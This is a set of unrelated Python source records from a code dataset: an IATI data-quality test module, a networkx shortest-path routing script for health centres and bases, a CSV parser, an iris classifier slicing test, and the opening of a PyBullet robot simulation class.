activity.etree.xpath('document-link[category/@code=\"A09\"]')\n if mous == []:\n continue\n for c in activity.etree.xpath('recipient-country/@code'):\n country_strategies[c] = {\n 'dataset': dataset.name,\n 'identifier': activity.id,\n 'index': idx,\n 'result': 'pass',\n 'hierarchy': activity.etree.get('hierarchy', '1'),\n 'explanation': 'A09 found for {}',\n }\n\n for idx, organisation in enumerate(dataset.organisations):\n org_level_docs = organisation.etree.xpath(\n 'document-link[category/@code=\"B03\"]/recipient-country/@code')\n org_level_docs += organisation.etree.xpath(\n 'document-link[category/@code=\"B13\"]/recipient-country/@code')\n org_level_docs = list(set(org_level_docs))\n for c in org_level_docs:\n country_strategies[c] = {\n 'dataset': dataset.name,\n 'identifier': organisation.id,\n 'index': idx,\n 'result': 'pass',\n 'hierarchy': 1,\n 'explanation': 'B03 or B13 found for {}',\n }\n\n default_row = {\n 'dataset': '',\n 'identifier': '',\n 'index': 0,\n 'result': 'fail',\n 'hierarchy': 1,\n 'explanation': 'No country strategy or MoU found for {}',\n }\n fieldnames = ['dataset', 'identifier', 'index', 'result',\n 'hierarchy', 'explanation']\n with open(output_filepath, 'w') as handler:\n writer = csv.DictWriter(handler, fieldnames=fieldnames)\n writer.writeheader()\n for country_code in current_country_codes:\n row = country_strategies.get(country_code, dict(default_row))\n row['explanation'] = row['explanation'].format(country_code)\n writer.writerow(row)\n\n\ndef disaggregated_budget(org, snapshot_date, test_name,\n current_data_results, condition):\n iati_result_path = current_app.config.get('IATI_RESULT_PATH')\n output_filepath = join(iati_result_path,\n snapshot_date, org.organisation_code,\n utils.slugify(test_name) + '.csv')\n\n iati_data_path = current_app.config.get('IATI_DATA_PATH')\n snapshot_xml_path = join(iati_data_path, snapshot_date)\n publisher = iatikit.data(snapshot_xml_path).publishers.get(\n org.registry_slug)\n\n codelists = iatikit.codelists()\n current_country_codes = get_current_countries(\n publisher, current_data_results)\n\n disaggregated_budget_tmpl = '''@iati-organisation\nFeature: Total disaggregated budget\n\n Scenario: Country budget available one year forward\n Given file is an organisation file\n Then `recipient-country-budget[recipient-country/@code=\"{country_code}\"]` should be available 1 year forward\n\n Scenario: Country budget available two years forward\n Given file is an organisation file\n Then `recipient-country-budget[recipient-country/@code=\"{country_code}\"]` should be available 2 years forward\n\n Scenario: Country budget available three years forward\n Given file is an organisation file\n Then `recipient-country-budget[recipient-country/@code=\"{country_code}\"]` should be available 3 years forward\n '''\n base_path = join(dirname(current_app.root_path),\n 'index_indicator_definitions', 'test_definitions')\n step_definitions = join(base_path, 'step_definitions.py')\n tester = BDDTester(step_definitions)\n\n explanation_tmpl = 'Budget for {country_code} {found} ' + \\\n '{year} year{plural} forward'\n fieldnames = ['dataset', 'identifier', 'index', 'result',\n 'hierarchy', 'explanation']\n with open(output_filepath, 'w') as handler:\n writer = csv.DictWriter(handler, fieldnames=fieldnames)\n writer.writeheader()\n for country_code in current_country_codes:\n feature = tester._gherkinify_feature(\n disaggregated_budget_tmpl.format(country_code=country_code))\n for dataset in publisher.datasets:\n for idx, organisation in enumerate(dataset.organisations):\n\n if condition:\n activity_condition, org_condition = condition.split('|')\n\n if org_condition.strip() and not organisation.etree.xpath(org_condition):\n continue\n\n for year, test in enumerate(feature.tests):\n result = test(\n organisation.etree,\n today=snapshot_date,\n codelists=codelists)\n explanation = explanation_tmpl.format(\n country_code=country_code,\n found='found' if result else 'not found',\n year=year + 1,\n plural='s' if year > 0 else '',\n )\n writer.writerow({\n 'dataset': dataset.name,\n 'identifier': organisation.id,\n 'index': idx,\n 'result': 'pass' if result else 'fail',\n 'hierarchy': 1,\n 'explanation': explanation,\n })\n","sub_path":"beta/infotest.py","file_name":"infotest.py","file_ext":"py","file_size_in_byte":7186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"48613067","text":"import time\nimport math\nimport networkx as nx\nimport csv \nimport json\n\n#clases\n#class Nodo():\n# def __init__(id, coordenada_x, coordenada_y):\n# self.id = id\n# self.coordenada_x = coordenada_x\n# self.coordenada_y = coordenada_y\n\n#lectura archivo eventos.csv\nwith open('eventos.csv') as eventos:\n lista_eventos = []\n contador = 0\n for i in csv.reader(eventos):\n \n lista_eventos.append(i[0])\n contador += 1\n\n\ndef calcular_distancia(coordenada_x1, coordenada_y1, coordenada_x2, coordenada_y2):\n distancia = ((float(coordenada_y2) - float(coordenada_y1))**2 + (float(coordenada_x2) - float(coordenada_x1))**2)**(0.5)\n return distancia\n\ndef nodo_mas_cercano(coordenada_x_evento, coordenada_y_evento, Grafo):\n contador = 0\n for diccionario_nodo in Grafo.nodes.values():\n id_nodo = diccionario_nodo[\"Id\"]\n coordenada_x_nodo = diccionario_nodo[\"Coordenada x\"]\n coordenada_y_nodo = diccionario_nodo[\"Coordenada y\"]\n distancia = calcular_distancia(coordenada_x_evento, coordenada_y_evento, coordenada_x_nodo, coordenada_y_nodo)\n if contador > 0:\n if distancia < distancia_minima_hasta_el_momento:\n distancia_minima_hasta_el_momento = distancia\n id_nodo_hasta_el_momento = id_nodo\n else:\n distancia_minima_hasta_el_momento = distancia\n id_nodo_hasta_el_momento = id_nodo\n contador += 1\n return id_nodo_hasta_el_momento\n\n\n#creación del grafo utilizando la librería de networkx\nGrafo = nx.DiGraph()\n\n#lectura archivo nodos.csv\nwith open('nodos.csv') as nodos:\n lista_nodos = []\n contador = 0\n for i in csv.reader(nodos):\n if contador > 0:\n lista_nodos.append(i)\n contador += 1\n\n\n#agregación al grafo de los nodos de nodos.csv, a un diccionario de nodos, donde cada llave del diccionario es el id del nodo, y el value es otro diccionario con llaves \"Id\", \"Coordenada x\" y \"Coordenada y\" y values los valores correspondientes \nfor nodo in lista_nodos:\n informacion_nodo = nodo[0]\n lista_informacion_nodo = informacion_nodo.split(\";\")\n id_nodo = int(lista_informacion_nodo[0])\n coordenada_x_nodo = float(lista_informacion_nodo[1])\n coordenada_y_nodo = float(lista_informacion_nodo[2])\n Grafo.add_node(id_nodo)\n Grafo.nodes[id_nodo][\"Id\"] = id_nodo\n Grafo.nodes[id_nodo][\"Coordenada x\"] = coordenada_x_nodo\n Grafo.nodes[id_nodo][\"Coordenada y\"] = coordenada_y_nodo\n\n\n#lectura archivo arcos.csv \nwith open('arcos.csv') as calles:\n lista_calles = []\n contador = 0\n for i in csv.reader(calles):\n if contador > 0:\n lista_calles.append(i)\n contador += 1\n\nfor calle in lista_calles:\n informacion_calle = calle[0]\n lista_informacion_calle = informacion_calle.split(\";\")\n id_nodo_origen = int(lista_informacion_calle[0])\n id_nodo_destino = int(lista_informacion_calle[1])\n v0 = float(lista_informacion_calle[2])\n v1 = float(lista_informacion_calle[3])\n v2 = float(lista_informacion_calle[4])\n v3 = float(lista_informacion_calle[5])\n v4 = float(lista_informacion_calle[6])\n v5 = float(lista_informacion_calle[7])\n v6 = float(lista_informacion_calle[8])\n v7 = float(lista_informacion_calle[9])\n v8 = float(lista_informacion_calle[10])\n v9 = float(lista_informacion_calle[11])\n v10 = float(lista_informacion_calle[12])\n v11 = float(lista_informacion_calle[13])\n v12 = float(lista_informacion_calle[14])\n v13 = float(lista_informacion_calle[15])\n v14 = float(lista_informacion_calle[16])\n v15 = float(lista_informacion_calle[17])\n v16 = float(lista_informacion_calle[18])\n v17 = float(lista_informacion_calle[19])\n v18 = float(lista_informacion_calle[20])\n v19 = float(lista_informacion_calle[21])\n v20 = float(lista_informacion_calle[22])\n v21 = float(lista_informacion_calle[23])\n v22 = float(lista_informacion_calle[24])\n v23 = float(lista_informacion_calle[25])\n\n cola_arco = id_nodo_origen\n cabeza_arco = id_nodo_destino\n\n nodo_origen = Grafo.nodes[id_nodo_origen]\n nodo_destino = Grafo.nodes[id_nodo_destino]\n\n #x1,y1,x2,y2\n distancia_arco = calcular_distancia(nodo_origen[\"Coordenada x\"], nodo_origen[\"Coordenada y\"], nodo_destino[\"Coordenada x\"], nodo_destino[\"Coordenada y\"])\n\n Grafo.add_edge(cola_arco, cabeza_arco)\n Grafo.edges[cola_arco, cabeza_arco][\"Distancia\"] = distancia_arco\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 0\"] = distancia_arco / v0\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 1\"] = distancia_arco / v1\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 2\"] = distancia_arco / v2\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 3\"] = distancia_arco / v3\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 4\"] = distancia_arco / v4\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 5\"] = distancia_arco / v5\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 6\"] = distancia_arco / v6\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 7\"] = distancia_arco / v7\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 8\"] = distancia_arco / v8\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 9\"] = distancia_arco / v9\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 10\"] = distancia_arco / v10\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 11\"] = distancia_arco / v11\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 12\"] = distancia_arco / v12\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 13\"] = distancia_arco / v13\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 14\"] = distancia_arco / v14\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 15\"] = distancia_arco / v15\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 16\"] = distancia_arco / v16\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 17\"] = distancia_arco / v17\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 18\"] = distancia_arco / v18\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 19\"] = distancia_arco / v19\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 20\"] = distancia_arco / v20\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 21\"] = distancia_arco / v21\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 22\"] = distancia_arco / v22\n Grafo.edges[cola_arco, cabeza_arco][\"Tiempo 23\"] = distancia_arco / v23\n\n#función que obtiene rutas a mínimo tiempo dentro de un grafo ya instanciado Grafo, considerando una lista de orígenes y una lista de destinos dados como argumentos, además del tiempo sobre el cual se quiere hacer el cálculo de rutas entre los 24 tiempos que hay en el día\ndef rutas_tiempo_minimo_dijkstra_bidireccional(Grafo,lista_origenes,lista_destinos, string_tiempo):\n A=time.time()\n diccionario_tiempos={}\n diccionario_rutas={}\n contador=1\n diccionario_rutas_tiempo_minimo_centros_a_bases = dict()\n for origen in lista_origenes:\n centro = origen\n diccionario_rutas_tiempo_minimo_centros_a_bases[centro] = []\n for origen in lista_origenes:\n for destino in lista_destinos:\n id_centro = origen\n id_base = destino\n a=time.time()\n tupla_origen_destino = (origen,destino)\n resultados_tiempo_minimo = nx.bidirectional_dijkstra(Grafo, origen, destino,weight=string_tiempo)\n print(f\"ALGORITMO DE DIJKSTRA BIDIRECCIONAL PARA TIEMPOS ({string_tiempo})\")\n print(\"Ruta número\", contador, \"para\", string_tiempo)\n tiempo_ruta_tiempo_minimo = resultados_tiempo_minimo[0]\n lista_ruta_tiempo_minimo = resultados_tiempo_minimo[1]\n diccionario_tiempos[tupla_origen_destino] = tiempo_ruta_tiempo_minimo\n diccionario_rutas[tupla_origen_destino] = lista_ruta_tiempo_minimo\n print(\"Tiempo mínimo desde el nodo\",origen,\"al nodo\", destino,\":\",tiempo_ruta_tiempo_minimo)\n print(\"Lista de nodos de la ruta de tiempo mínimo\", lista_ruta_tiempo_minimo)\n b=time.time()\n print(\"Tiempo que tomó la obtención de ruta a tiempo mínimo usando Dijkstra Bidireccional para este par origen-destino (\",origen,\"-\",destino,\"):\",b-a,\"segundos; equivalente a\",\n (b-a)/60,\"minutos\")\n print(\"\")\n contador+=1\n\n lista_de_3_elementos_sobre_ruta_centro_a_base = [tiempo_ruta_tiempo_minimo, lista_ruta_tiempo_minimo, id_base]\n diccionario_rutas_tiempo_minimo_centros_a_bases[id_centro].append(lista_de_3_elementos_sobre_ruta_centro_a_base)\n\n B=time.time()\n segundos=B-A\n minutos=segundos/60\n horas=minutos/60\n for origen in lista_origenes:\n id_centro = origen\n diccionario_rutas_tiempo_minimo_centros_a_bases[id_centro].sort()\n\n return diccionario_rutas_tiempo_minimo_centros_a_bases\n\n\nprint(\"\")\nprint(\"Número de nodos (intersecciones) del grafo\", len(Grafo.nodes))\nprint(\"Número de arcos (calles) del grafo\", len(Grafo.edges))\nprint(\"\")\n\n\ndiccionario_centros_salud = dict()\n#lectura archivo centros.csv\nwith open('centros.csv') as centros:\n lista_centros_destinos = []\n contador = 0\n ca = []\n caa = []\n for i in csv.reader(centros):\n if contador > 0:\n lista_informacion_centros = i[0].split(\";\")\n coordenada_x_centro = float(lista_informacion_centros[0])\n coordenada_y_centro = float(lista_informacion_centros[1])\n id_nodo_mas_cercano_a_centro = nodo_mas_cercano(coordenada_x_centro, coordenada_y_centro, Grafo)\n\n lista_centros_destinos.append(id_nodo_mas_cercano_a_centro)\n tupla_coordenadas = (coordenada_x_centro, coordenada_y_centro)\n bool_agregar_coordenada = False\n for id_centro in diccionario_centros_salud.keys():\n if id_centro == id_nodo_mas_cercano_a_centro:\n bool_agregar_coordenada = True\n if bool_agregar_coordenada == True:\n diccionario_centros_salud[id_nodo_mas_cercano_a_centro].append(tupla_coordenadas)\n else:\n diccionario_centros_salud[id_nodo_mas_cercano_a_centro] = [tupla_coordenadas]\n \n\n\n\n\n if (Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada x\"], Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada y\"] ) in ca:\n #print(Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada x\"], Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada y\"])\n #print(coordenada_x_centro, coordenada_y_centro)\n for i in caa:\n id_nodo_mas_cercano_a_centro2 = nodo_mas_cercano(i[0], i[1], Grafo)\n if id_nodo_mas_cercano_a_centro == id_nodo_mas_cercano_a_centro2:\n #print(i[0], i[1])\n #print(coordenada_x_centro, coordenada_y_centro)\n #print(Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada x\"], Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada y\"])\n pass\n else:\n ca.append((Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada x\"],Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada y\"] ))\n caa.append((coordenada_x_centro, coordenada_y_centro))\n #print()\n contador += 1\n\n#lectura archivo bases.csv\nwith open('bases.csv') as bases:\n lista_bases_origenes = []\n contador = 0\n ca = []\n caa = []\n for i in csv.reader(bases):\n if contador > 0:\n lista_informacion_bases = i[0].split(\";\")\n coordenada_x_base = float(lista_informacion_bases[0])\n coordenada_y_base = float(lista_informacion_bases[1])\n id_nodo_mas_cercano_a_base = nodo_mas_cercano(coordenada_x_base, coordenada_y_base, Grafo)\n lista_bases_origenes.append(id_nodo_mas_cercano_a_base)\n #print(id_nodo_mas_cercano_a_base)\n #print()\n if (Grafo.nodes[id_nodo_mas_cercano_a_base][\"Coordenada x\"], Grafo.nodes[id_nodo_mas_cercano_a_base][\"Coordenada y\"] ) in ca:\n #print(Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada x\"], Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada y\"])\n #print(coordenada_x_centro, coordenada_y_centro)\n for i in caa:\n id_nodo_mas_cercano_a_base2 = nodo_mas_cercano(i[0], i[1], Grafo)\n if id_nodo_mas_cercano_a_base == id_nodo_mas_cercano_a_base2:\n #print(i[0], i[1])\n #print(coordenada_x_centro, coordenada_y_centro)\n #print(Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada x\"], Grafo.nodes[id_nodo_mas_cercano_a_centro][\"Coordenada y\"])\n pass\n else:\n ca.append((Grafo.nodes[id_nodo_mas_cercano_a_base][\"Coordenada x\"],Grafo.nodes[id_nodo_mas_cercano_a_base][\"Coordenada y\"] ))\n caa.append((coordenada_x_base, coordenada_y_base))\n #print()\n contador += 1\n\nlista_reducida_eventos = lista_eventos[1:80]\ndiccionario_eventos = dict()\nlista_nodos_eventos = []\nfor evento in lista_reducida_eventos:\n evento = evento.split(\";\")\n coordenada_x = evento[0]\n coordenada_y = evento[1]\n id_nodo_mas_cercano = nodo_mas_cercano(coordenada_x, coordenada_y, Grafo)\n tupla_coordenadas = (coordenada_x, coordenada_y)\n lista_nodos_eventos.append(id_nodo_mas_cercano)\n bool_agregar_coordenada = False\n for id_evento in diccionario_eventos.keys():\n if id_evento == id_nodo_mas_cercano:\n bool_agregar_coordenada = True\n if bool_agregar_coordenada == True:\n diccionario_eventos[id_nodo_mas_cercano].append(tupla_coordenadas)\n else:\n diccionario_eventos[id_nodo_mas_cercano] = [tupla_coordenadas]\n\n\nset_nodos = set(lista_nodos_eventos)\nprint(f\"Largo de lista con id de nodos asociados a eventos: {len(lista_nodos_eventos)}\")\nprint(f\"Largo de set con id de nodos asociados a eventos: {len(set(lista_nodos_eventos))}\")\nprint(\"Los 79 eventos del primer día, se asocian a 78 nodos diferentes, por lo tanto existen 2 eventos que se asocian a un mismo nodo de la ciudad\")\nfor j, i in diccionario_eventos.items():\n cantidad_eventos_asociados_a_nodo = len(i)\n if cantidad_eventos_asociados_a_nodo > 1:\n print(f\"El nodo con id {j} tiene asociado más de un evento. En particular, tiene asociado {cantidad_eventos_asociados_a_nodo} eventos. A continuación se muestran las coordenadas de los eventos asociados: {i}\") \nprint()\nprint(f\"Largo de lista con id de nodos asociados a centros de salud: {len(lista_centros_destinos)}\")\nprint(f\"Largo de set con id de nodos asociados a centros de salud: {len(set(lista_centros_destinos))}\")\nprint(\"Existen 2 centros de salud asociados a un mismo nodo. Esto significará eliminar uno de la modelación.\")\nfor j, i in diccionario_centros_salud.items():\n cantidad_centros_asociados_a_nodo = len(i)\n if cantidad_centros_asociados_a_nodo > 1:\n print(f\"El nodo con id {j} tiene asociado más de un centro de salud. En particular, tiene asociado {cantidad_centros_asociados_a_nodo} centros de salud. A continuación se muestran las coordenadas de los centros de salud asociados: {i}\") \nprint()\nprint(f\"Largo de lista con id de nodos asociados a centros de salud y con id de nodos asociados a eventos (len(lista_nodos_eventos+lista_centros_destinos)): {len(lista_nodos_eventos+lista_centros_destinos)}\")\nprint(f\"Largo de set con id de nodos asociados a centros de salud y con id de nodos asociados a eventos (len((set(lista_nodos_eventos+lista_centros_destinos)))): {len(set(lista_nodos_eventos+lista_centros_destinos))}\")\nprint(\"Existen en 2 ocasiones que un mismo nodo está asociado tanto a un evento como a un centro de salud.\")\nfor nodo_evento in list(set(lista_nodos_eventos)):\n for centro_salud in lista_centros_destinos:\n if nodo_evento == centro_salud:\n print(f'-El nodo con id {nodo_evento} y coordenadas ({Grafo.nodes[nodo_evento][\"Coordenada x\"]};{Grafo.nodes[nodo_evento][\"Coordenada y\"]}), tiene asociado tanto un evento como un centro de salud. El evento asociado ocurrió en las coordenadas: {diccionario_eventos[nodo_evento]}. El centro de salud tiene las siguientes coordenadas: {diccionario_centros_salud[nodo_evento]}')\nprint()\nprint(f\"Largo de lista con id de nodos asociados a bases: {len(lista_bases_origenes)}\")\nprint(f\"Largo de set con id de nodos asociados a bases: {len(set(lista_bases_origenes))}\")\nprint(\"No existen bases que se asocien a un mismo nodo del grafo.\")\n\nlista_bases = lista_bases_origenes\n#Código para sacar rutas a tiempo mínimo usando dijkstra bidireccional con origen los nodos asociados a los eventos del primer día de eventos.csv y destino los centros de salud\nA = time.time()\ncontador = 0\ndiccionario_24_tiempos = dict()\nfor i in range(24): \n lista_centros_origenes = list(set(lista_centros_destinos))\n lista_bases_destinos = list(set(lista_bases))\n fstring = f\"Tiempo {i}\"\n diccionario_dijkstra_bidireccional_tiempo_centros_de_salud_a_bases = rutas_tiempo_minimo_dijkstra_bidireccional(Grafo, lista_centros_origenes, lista_bases_destinos, fstring)\n diccionario_24_tiempos[fstring] = diccionario_dijkstra_bidireccional_tiempo_centros_de_salud_a_bases\n cantidad_de_rutas_por_tiempo = len(lista_centros_origenes)*len(lista_bases_destinos)\n contador += cantidad_de_rutas_por_tiempo\nB = time.time()\n\nprint(f\"El tiempo que tomó calcular las {contador} = {len(lista_centros_origenes)}*{len(lista_bases_destinos)}*24 rutas a tiempo mínimo fue de {B-A} segundos, equivalente a {(B-A)/60} minutos, equivalente a {(B-A)/3600} horas\")\nprint(f\"El tiempo promedio que tomó calcular cada ruta fue de {(B-A)/contador} segundos, equivalente a {(B-A)/(60*contador)} minutos, equivalente a {(B-A)/(3600*contador)} horas\")\n\n\n\n\n\n\n# {id_nodo_asociado_a_evento : lista_rutas_de_un_evento}\n# {1: [(20, [5,7,3,4,1], 5), ]}\n\n\n\n#a = [(2, \"hola\"), (1, \"chao\")]\n#a.sort()\n#print(a)\n\n\n\ndiccionario_24_tiempos_rutas_centros_a_bases = diccionario_24_tiempos\n#diccionario_24_tiempos_rutas_centros_a_bases = {\"Tiempo 0\": {id_centro1: [[tiempo1, [ruta1], id_base1], [tiempo2, [ruta2], id_base2], ....], ..., id_centro_66: [[tiempo1, [ruta1], id_base1], [tiempo2, [ruta2], id_base2], ....]}, ..., \"Tiempo 24\": {id_centro1: [[tiempo1, [ruta1], id_base1], [tiempo2, [ruta2], id_base2], ....], ..., id_centro_66: [[tiempo1, [ruta1], id_base1], [tiempo2, [ruta2], id_base2], ....]}}\n#A LA SIMULACIÓN HAY QUE PASARLE EL DICCIONARIO diccionario_24_tiempos_rutas_centros_a_bases\nwith open(\"diccionario_24_tiempos_rutas_centros_a_bases.json\", \"w\") as f:\n json.dump(diccionario_24_tiempos_rutas_centros_a_bases, f)","sub_path":"dijkstra_reducido_centros_a_bases.py","file_name":"dijkstra_reducido_centros_a_bases.py","file_ext":"py","file_size_in_byte":18597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"613159556","text":"import csv\n\nfile = 'app/test_data.txt'\n#file = 'app/static/ulta/product_data.txt'\n\n\ncount = 0\nwith open(file) as f:\n line = f.readline()\n for lines in f:\n \tcount+=1\ncolumn_length = len(line.split())\ncl = column_length\nrow_length = count\nrl = row_length\n\ndata_parse = list(csv.reader(open(file, 'rb'), delimiter='\\t'))\ndp = data_parse\nd =dict()\t\n\nfields = dp[0]\n\ndef tick():\n\tdp = data_parse\n\trl = row_length\n\ticount = 1\n\tlst =[]\n\twhile rl > 0:\n\t line = dp[icount][count]\n\t lst.append(\"\".join([ch for ch in line if ord(ch)<= 128])) #lst.append(line)\n\t rl = rl - 1\n\t icount+=1\n\td[field] = lst\n\ncount = 0\nfor field in fields:\n\ttick()\n\tcl = cl -1\n\tcount+=1\n\n\n","sub_path":"dev_app/app/dataparse.py","file_name":"dataparse.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"464991294","text":"import pandas as pd\nfrom sklearn.preprocessing import OneHotEncoder\n\nimport slicing.slicer as slicer\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn import preprocessing\nfrom sklearn.model_selection import train_test_split\n\n\ndataset = pd.read_csv('iris.csv')\nattributes_amount = len(dataset.values[0])\nx = dataset.iloc[:, 0:attributes_amount - 1].values\nenc = OneHotEncoder(handle_unknown='ignore')\nx = enc.fit_transform(x).toarray()\ny = dataset.iloc[:, attributes_amount - 1]\nle = preprocessing.LabelEncoder()\nle.fit(y)\ny = le.transform(y)\ncomplete_x = []\ncomplete_y = []\ncounter = 0\nall_indexes = []\nall_features = enc.get_feature_names()\nx_size = len(complete_x)\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)\nfor item in x_test:\n complete_x.append((counter, item))\n complete_y.append((counter, y_test[counter]))\n counter = counter + 1\nx_size = counter\nclf = RandomForestClassifier(n_jobs=2, random_state=0)\nclf.fit(x_train, y_train)\nRandomForestClassifier(bootstrap=True, class_weight=None, criterion='gini',\n max_depth=None, max_features='auto', max_leaf_nodes=None,\n min_impurity_split=1e-07, min_samples_leaf=1,\n min_samples_split=2, min_weight_fraction_leaf=0.0,\n n_estimators=10, n_jobs=2, oob_score=False, random_state=0,\n verbose=0, warm_start=False)\n\n# alpha is size significance coefficient\n# verbose option is for returning debug info while creating slices and printing it\n# k is number of top-slices we want\n# w is a weight of error function significance (1 - w) is a size significance propagated into optimization function\n# loss_type = 0 (l2 in case of regression model\n# loss_type = 1 (cross entropy in case of classification model)\npreds = clf.predict(x_test)\npredictions = []\ncounter = 0\nmistakes = 0\nfor pred in preds:\n predictions.append((counter, pred))\n if y_test[counter] != pred:\n mistakes = mistakes + 1\n counter = counter + 1\nlossF = mistakes / counter\nslicer.process(all_features, clf, complete_x, lossF, x_size, complete_y, predictions, debug=True, alpha=6, k=10,\n w=0.5, loss_type=1)\n","sub_path":"scripts/staging/slicing/base/tests/classification/test_iris.py","file_name":"test_iris.py","file_ext":"py","file_size_in_byte":2168,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"8"} +{"seq_id":"493959367","text":"from scipy.spatial.transform import Rotation as npRotation\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport math\nimport re\nimport time\nimport yaml\n\n\nclass Simulation_base:\n \"\"\"A Bullet simulation involving Nextage robot\"\"\"\n\n ########## Class initialiser ##########\n def __init__(self, pybulletConfigs, robotConfigs):\n \"\"\"Creates a simulation instance with Nextage robot\n Keyword Arguments:\n pybulletConfigs (dict) = {\n \"simulation\" : bullet_simulation -- pybullet package\n \"pybullet_extra_data\" : pybullet_data -- pybullet_data package\n \"gui\" : True -- enables the gui visualizer, if False it will runs headless\n \"panels\" : False -- show/hide the user interaction pyBullet panels\n \"realTime\" : False -- use realtime simulation\n \"controlFrequency\" : 1000 -- pybullet control updating frequency (in hertz)\n \"updateFrequency\" : 250 -- pybullet debug view updating frequency (in hertz)\n \"gravity\" : -9.81 -- gravity constant\n \"gravityCompensation\" : 0.9 -- a naive way to compensate gravity\n \"floor\" : True -- show floor or not\n \"cameraSettings\" : None -- initial camera settings\n }\n robotConfigs (dict) = {\n \"robotPath\" : str -- path_to_robot_urdf_file\n \"robotPIDConfigs\" : str -- path_to_robot_PID_configs_file\n \"robotStartPos\" : [0, 0, 0.85] -- starting position of the robot \n \"robotStartOrientation\" : [0,0,0,1] -- starting orientation of the robot\n \"fixedBase\" : False -- makes the base of the robot floating/fixed\n \"colored\" : False -- makes the robot coloured\n }\n \"\"\"\n\n self.pybulletConfigs = pybulletConfigs\n self.robotConfigs = robotConfigs\n self.p = self.pybulletConfigs[\"simulation\"]\n self.gui = pybulletConfigs[\"gui\"]\n self.pybullet_data = self.pybulletConfigs[\"pybullet_extra_data\"]\n self.controlFrequency = pybulletConfigs[\"controlFrequency\"]\n self.updateFrequency = pybulletConfigs[\"updateFrequency\"]\n self.dt = 1. / self.controlFrequency\n\n self.cameraPresets = {\n \"cameraPreset1\": (1.8, 122.0, -27.6, (-0.03, 0.03, 0.83)),\n \"cameraPreset2\": (1.2, 172.0, 4.0, (0.26, -0.21, 1.14)),\n \"cameraPreset3\": (1.4, 49.2, -6.4, (0.23, 0.48, 0.88)),\n \"cameraPreset4\": (1.2, 126.4, -12.8, (-0.12, -0.01, 0.99)),\n \"cameraPreset5\": (1.2, 90, -22.8, (-0.12, -0.01, 0.99))\n }\n\n ### Simulation setup\n # Instanciating bullet\n if self.gui:\n self.physicsClient = self.p.connect(self.p.GUI)\n else:\n self.physicsClient = self.p.connect(self.p.DIRECT)\n\n # GUI / visual configs\n if not self.pybulletConfigs[\"panels\"]:\n self.p.configureDebugVisualizer(self.p.COV_ENABLE_GUI, 0)\n self.p.configureDebugVisualizer(\n self.p.COV_ENABLE_SEGMENTATION_MARK_PREVIEW, 0)\n self.p.configureDebugVisualizer(\n self.p.COV_ENABLE_DEPTH_BUFFER_PREVIEW, 0)\n self.p.configureDebugVisualizer(\n self.p.COV_ENABLE_RGB_BUFFER_PREVIEW, 0)\n self.p.configureDebugVisualizer(self.p.COV_ENABLE_MOUSE_PICKING, 1)\n if \"cameraPreset\" in self.pybulletConfigs[\"cameraSettings\"]:\n # try to resolve camera config as a string\n try:\n self.p.resetDebugVisualizerCamera(\n *self.cameraPresets[self.pybulletConfigs[\"cameraSettings\"]])\n except:\n self.p.resetDebugVisualizerCamera(\n *self.cameraPresets[\"cameraPreset1\"])\n else:\n # try to resolve camera config as a camera config\n try:\n self.p.resetDebugVisualizerCamera(\n *self.pybulletConfigs[\"cameraSettings\"])\n except:\n self.p.resetDebugVisualizerCamera(\n *self.cameraPresets[\"cameraPreset1\"])\n\n # Engine parameters\n self.p.setRealTimeSimulation(pybulletConfigs[\"realTime\"])\n self.p.setGravity(0, 0, pybulletConfigs[\"gravity\"])\n self.p.setPhysicsEngineParameter(fixedTimeStep=self.dt)\n\n # Gravity compensation ratio\n self.gravityCompensationRatio = pybulletConfigs[\"gravityCompensation\"]\n\n ### Loading objects/robots\n # add directories\n self.p.setAdditionalSearchPath(self.pybullet_data.getDataPath())\n\n # Loading floor and/or plane ground\n if pybulletConfigs[\"floor\"]:\n self.floor = self.p.loadURDF(\"plane.urdf\")\n else:\n self.floor = None\n\n # Loading robot\n self.mass = None\n robotFixedBase = 1 if robotConfigs[\"fixedBase\"] else 0\n self.robot = self.p.loadURDF(\n fileName=robotConfigs[\"robotPath\"],\n basePosition=robotConfigs[\"robotStartPos\"],\n 